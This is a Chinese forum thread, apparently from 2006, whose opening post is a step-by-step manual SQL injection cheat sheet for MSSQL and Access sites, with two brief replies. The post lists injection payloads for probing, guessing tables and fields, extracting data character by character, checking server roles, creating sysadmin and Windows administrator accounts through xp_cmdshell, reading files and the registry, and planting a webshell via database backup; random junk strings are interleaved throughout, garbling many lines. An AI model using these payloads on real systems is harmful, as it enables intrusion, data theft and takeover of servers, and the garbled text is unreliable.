社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4948阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 "oQ@.]-#  
  2.初步判断是否是mssql ;and user>0 m[f\I^ \%8  
vY6|V$  
  3.注入参数是字符'and [查询条件] and ''=' xjpW<-)MLf  
53QP~[F8R]  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 'Vd>"ti  
?)&TewP  
  5.判断数据库系统 vKeK]  
7^F?key?  
  ;and (select count(*) from sysobjects)>0 mssql /<@tbZJ*8  
z$NLFJvy_-  
  ;and (select count(*) from msysobjects)>0 access tj3p71%  
wHmEt ORo  
R)=<q]Ms  
e_I 8Jj4  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0  e(^O8  
D<`X B*  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 -_3.]o/J  
b%BwGS(z  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 :vjbuqN]  
2-4%h!  
  9.(1)猜字段的ascii值(access) oaHBz_pg  
~EBZlTN  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 0U<9=[~q7@  
uD"Voh|]=  
  (2)猜字段的ascii值(mssql) =ZQIpc  
!v-(O"a  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 #?9o A4Q  
iq#Z\Y(  
  10.测试权限结构(mssql) T1E=<q4  
- M]C-$  
,<BTv;4p  
?6Gq &  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 5>HI/QG  
&Ru6Yt0W  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Dz?F,g_  
c1`o3gb  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- TsQMwV_h  
M@8(h=  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- "elh~K  
Q|>y2g!  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- {9)f~EbM!  
=k'dbcfO$9  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- mXr)lA  
pnD#RvmW2e  
  ;and 1=(select IS_MEMBER('db_owner'));-- .f}I$ "2  
EQ28pAZ  
bke 1 F '  
iG ;6e~p  
  11.添加mssql和系统的帐户 [# _ceg1G  
2eNm2;  
  ;exec master.dbo.sp_addlogin username;-- 7G/"!ePW6`  
  ;exec master.dbo.sp_password null,username,password;-- -+L1Hid.7  
<AVpFy  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- W`Soa&9  
\rpu=*gt  
  ;exec master.dbo.xp_cmdshell 'net user username password $j:0*Z=>  
&~j"3G;e  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- U+K_eEI0_I  
6jn<YR E-  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- +RbCa c  
aU3&=aN+  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- M1^pW 63  
olqHa5qn  
(HTVSC%=  
T:si?7CR  
  12.(1)遍历目录 0<Y)yNsV  
+,smjg:O  
  ;create table dirs(paths varchar(100), id int) d; M&X!Y  
/ZczfM\  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' k: {$M yK  
M! s&<Bi  
  ;and (select top 1 paths from dirs)>0 =$m|M m[a  
pY2nv/  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)  6} 9A0  
O:#to  
y]Y)?])  
8Vq,J:+  
  (2)遍历目录 y]/{W}D  
]`MRH[{  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Q/< $ (Y  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 )P$ IXA\  
Nk 7Q  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 !u^(<.xJ   
k8h$#@^  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?0%lB=qQ  
O6`@'N>6P  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 *P_TG"^{W  
-X |G  
<'/+E4m  
f[.]JC+,  
  13.mssql中的存储过程 UZ<!(g.  
z_zr3XR9  
  xp_regenumvalues 注册表根键, 子键 c<e$6:|xM  
y"7?]#$9/  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 SO}Hc;Q1`  
 bSmRo  
  xp_regread 根键,子键,键值名 lVqvS/_k$  
sl)_HA7G  
  ;exec xp_regread 0n1y$*I4  
Gm*i='f!?  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 )]/!:I4e  
K$rH{dUM  
  xp_regwrite 根键,子键, 值名, 值类型, 值 [E=t{&t  
#Z fg  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 QutQG  
PPohpdd)  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 bzZEwMc6  
/$B<+;L!#  
  xp_regdeletevalue 根键,子键,值名 vHao y  
(ttO O45  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Chjth"  
?4xTA  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 =6? 3c\  
H*l8,*M}  
/9 [nogP  
eX}uZR  
  14.mssql的backup创建webshell VDscZt)y8  
C[~b6 UP  
  use model gvz&ppcG  
sB /*gO  
  create table cmd(str image); Fm*O&6W\@A  
s7=]!7QGS!  
  insert into cmd(str) values (''); -FJ 5N}R  
65MR(+3  
  backup database model to disk='c:\l.asp'; k{9s>l~'  
5HmX-+XpK  
C,K P!B{  
J7S  
  15.mssql内置函数 +f|u5c  
+`\C_i-  
  ;and (select @@version)>0 获得Windows的版本号 4j/8Otn  
[Q)lJTs  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa Byon2|nf7  
OrHnz981K  
  ;and (select user_name())>0 爆当前系统的连接用户 lB,.TK  
xAsbP$J:  
  ;and (select db_name())>0 得到当前连接的数据库 Ww@R ewo  
IX-ir  
X1$0'u sS  
:eDwkzlHH  
  16.简洁的webshell AWGeK-^  
pi+m`O   
  use model BLfoU_Z  
=`g+3 O;<  
  create table cmd(str image); n;4` IK|  
7IjFSN>  
  insert into cmd(str) values (''); EpS"NQEe  
oc>,5 x  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五